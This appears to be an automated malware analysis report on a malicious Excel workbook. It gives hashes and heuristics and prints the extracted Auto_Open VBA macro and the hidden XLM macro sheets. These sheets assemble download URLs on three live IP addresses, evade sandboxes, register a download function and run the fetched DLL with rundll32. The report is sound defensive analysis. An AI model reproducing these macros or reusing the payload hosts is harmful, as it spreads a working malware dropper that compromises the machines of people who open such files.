Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 191e8ce41d5808fc…

MALICIOUS

Office (OOXML)

216.1 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-06-17
MD5: c5e8197c45012f05b559e3260a6b5fa7 SHA-1: a40e127ab4e4b6afa290947665b387260d352412 SHA-256: 191e8ce41d5808fcc57a4fa74bfa746e3c9227b9c2a2f8a5968765746108985f
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

This Excel document contains critical Excel 4.0 macros that utilize dangerous functions like CALL and REGISTER to download and execute a second-stage payload. The Auto_Open macro is present, indicating immediate execution upon opening. The macros are designed to fetch content from the provided URLs, such as http://5.34.180.57/44313,6048108796.dat, which likely serves as the second-stage payload. The presence of hidden worksheets further suggests an attempt to conceal malicious activity.

Heuristics 7

  • Excel 4.0 macro sheet (3 sheet(s)) critical 1 related finding OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Dangerous XLM formula APIs: FORMULA, GOTO, HALT, REGISTER, EXEC critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 3 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://5.34.180.57/ In document text (OOXML body / shared strings)
    • http://45.138.157.216/In document text (OOXML body / shared strings)
    • http://45.12.32.131/In document text (OOXML body / shared strings)
    • http://5.34.180.57/44313,6048108796.datIn document text (OOXML body / shared strings)
    • http://45.138.157.216/44313,6048108796.datIn document text (OOXML body / shared strings)
    • http://45.12.32.131/44313,6048108796.datIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2651 bytes
SHA-256: 5b8703c963ccff58b2fe5575bbc6e69f0df0597a77d0f2f9ac7619e250577a21
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Sub Auto_Open()


Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True
Application.ScreenUpdating = False
Application.ScreenUpdating = True

Application.Run Sheets("Kost").Range("AM5")
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 12288 bytes
SHA-256: 4af5a69b72686ae2f95f829c98e98f406dae10333748edcada85b24b68aeebef
xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 4198 bytes
SHA-256: f90092cc573c0044407cb440d829560b618b9bf3234fc08e39504c578c519997
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{5E3EE2C8-4BD1-4A7A-8165-1C49BDB78CBA}"><dimension ref="AG57:AM77"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="1" width="6.28515625" style="3" customWidth="1"/><col min="2" max="2" width="14.28515625" style="3" customWidth="1"/><col min="3" max="31" width="9.140625" style="3"/><col min="32" max="32" width="9.140625" style="3" customWidth="1"/><col min="33" max="34" width="9.140625" style="3" hidden="1" customWidth="1"/><col min="35" max="35" width="17.5703125" style="3" hidden="1" customWidth="1"/><col min="36" max="38" width="9.140625" style="3" hidden="1" customWidth="1"/><col min="39" max="39" width="11.7109375" style="3" hidden="1" customWidth="1"/><col min="40" max="16384" width="9.140625" style="3"/></cols><sheetData><row r="57" spans="34:39" x14ac:dyDescent="0.25"><c r="AJ57" s="3"><v>1</v></c></row><row r="58" spans="34:39" x14ac:dyDescent="0.25"><c r="AJ58" s="3"><v>9</v></c></row><row r="60" spans="34:39" x14ac:dyDescent="0.25"><c r="AI60" s="3"><f>NOW()</f><v>44313.604810879631</v></c></row><row r="61" spans="34:39" x14ac:dyDescent="0.25"><c r="AI61" s="3" t="b"><f>FORMULA(AH73&amp;AH74&amp;AH75,AJ65)</f><v>0</v></c></row><row r="62" spans="34:39" x14ac:dyDescent="0.25"><c r="AH62" s="3" t="str"><f>CONCATENATE(AH68,AI60,AH66,AH67)</f><v>http://5.34.180.57/44313,6048108796.dat</v></c><c r="AM62" s="3" t="e"><f>IF(GET.WORKSPACE(42),,CLOSE(1))</f><v>#N/A</v></c></row><row r="63" spans="34:39" x14ac:dyDescent="0.25"><c r="AH63" s="3" t="str"><f>CONCATENATE(AH69,AI60,AH66,AH67)</f><v>http://45.138.157.216/44313,6048108796.dat</v></c></row><row r="64" spans="34:39" x14ac:dyDescent="0.25"><c r="AH64" s="3" t="str"><f>CONCATENATE(AH70,AI60,AH66,AH67)</f><v>http://45.12.32.131/44313,6048108796.dat</v></c><c r="AJ64" s="3" t="s"><v>3</v></c></row><row r="66" spans="34:39" x14ac:dyDescent="0.25"><c r="AH66" s="3" t="s"><v>0</v></c><c r="AJ66" s="3" t="s"><v>4</v></c></row><row r="67" spans="34:39" x14ac:dyDescent="0.25"><c r="AH67" s="3" t="s"><v>1</v></c><c r="AJ67" s="3" t="s"><v>5</v></c><c r="AM67" s="3" t="e"><f>IF(GET.WORKSPACE(19),,CLOSE(1))</f><v>#N/A</v></c></row><row r="68" spans="34:39" x14ac:dyDescent="0.25"><c r="AH68" s="3" t="s"><v>9</v></c><c r="AM68" s="3" t="e"><f>GET.WORKSPACE(26)</f><v>#N/A</v></c></row><row r="69" spans="34:39" x14ac:dyDescent="0.25"><c r="AH69" s="3" t="s"><v>10</v></c><c r="AI69" s="3" t="e"><f>GOTO(Blodas!G6)</f><v>#N/A</v></c><c r="AM69" s="3" t="b"><f>IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),ON.TIME(NOW()+"00:00:02","Milolos"),CLOSE(1))</f><v>0</v></c></row><row r="70" spans="34:39" x14ac:dyDescent="0.25"><c r="AH70" s="3" t="s"><v>11</v></c><c r="AJ70" s="3" t="s"><v>8</v></c></row><row r="72" spans="34:39" x14ac:dyDescent="0.25"><c r="AM72" s="3" t="b"><f>HALT()</f><v>0</v></c></row><row r="73" spans="34:39" x14ac:dyDescent="0.25"><c r="AH73" s="3" t="s"><v>2</v></c></row><row r="74" spans="34:39" x14ac:dyDescent="0.25"><c r="AH74" s="3" t="s"><v>7</v></c></row><row r="75" spans="34:39" x14ac:dyDescent="0.25"><c r="AH75" s="3" t="s"><v>6</v></c></row><row r="77" spans="34:39" x14ac:dyDescent="0.25"><c r="AI77" s="3" t="b"><f>GOTO(Jioka!H15)</f><v>0</v></c></row></sheetData><pageMargins left="0.7" 
... (truncated)
xlm_sheet_01.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet2.xml 2097 bytes
SHA-256: 0a66b50328ea57abfd0fba95f93001e89e484283026f92736f861e28fb7eaa14
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{B06B5105-687C-43F7-A487-3A7680CBC977}"><dimension ref="G11:G18"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="6" width="9.140625" style="2"/><col min="7" max="7" width="12.140625" style="2" customWidth="1"/><col min="8" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="11" spans="7:7" x14ac:dyDescent="0.25"><c r="G11" s="2" t="b"><f>REGISTER(Kost!AJ64,Kost!AJ65,Kost!AJ66,Kost!AJ67,,Kost!AJ57,9)</f><v>0</v></c></row><row r="12" spans="7:7" x14ac:dyDescent="0.25"><c r="G12" s="2" t="e"><f>Belandes(0,Kost!AH62,Kost!AJ70,0,0)</f><v>#NAME?</v></c></row><row r="13" spans="7:7" x14ac:dyDescent="0.25"><c r="G13" s="2" t="e"><f>IF(G12&lt;0, Belandes(0,Kost!AH63,Kost!AJ70,0,0))</f><v>#NAME?</v></c></row><row r="14" spans="7:7" x14ac:dyDescent="0.25"><c r="G14" s="2" t="e"><f>IF(G13&lt;0, Belandes(0,Kost!AH64,Kost!AJ70,0,0))</f><v>#NAME?</v></c></row><row r="16" spans="7:7" x14ac:dyDescent="0.25"><c r="G16" s="2"><f>IF(G14&lt;0,CLOSE(0),)</f><v>0</v></c></row><row r="18" spans="7:7" x14ac:dyDescent="0.25"><c r="G18" s="2" t="e"><f>GOTO(Kost!AI74)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>
xlm_sheet_02.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet3.xml 1832 bytes
SHA-256: 5e80fd069ac35c5e39918d8dfaaf0ba77875f57b487bcfcc5d8bc7d346806551
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s).
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{7CC12E8C-181F-40F2-A690-14110549575E}"><dimension ref="H9:I20"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="9.140625" style="2"/><col min="8" max="8" width="9.85546875" style="2" customWidth="1"/><col min="9" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="9" spans="8:9" x14ac:dyDescent="0.25"><c r="I9" s="2" t="str"><f>"rundll32 ..\Butyo.vikas"</f><v>rundll32 ..\Butyo.vikas</v></c></row><row r="10" spans="8:9" x14ac:dyDescent="0.25"><c r="I10" s="2" t="str"><f>",DllRegisterServer"</f><v>,DllRegisterServer</v></c></row><row r="16" spans="8:9" x14ac:dyDescent="0.25"><c r="H16" s="2" t="b"><f>EXEC(I9&amp;I10)</f><v>0</v></c></row><row r="20" spans="8:8" x14ac:dyDescent="0.25"><c r="H20" s="2" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.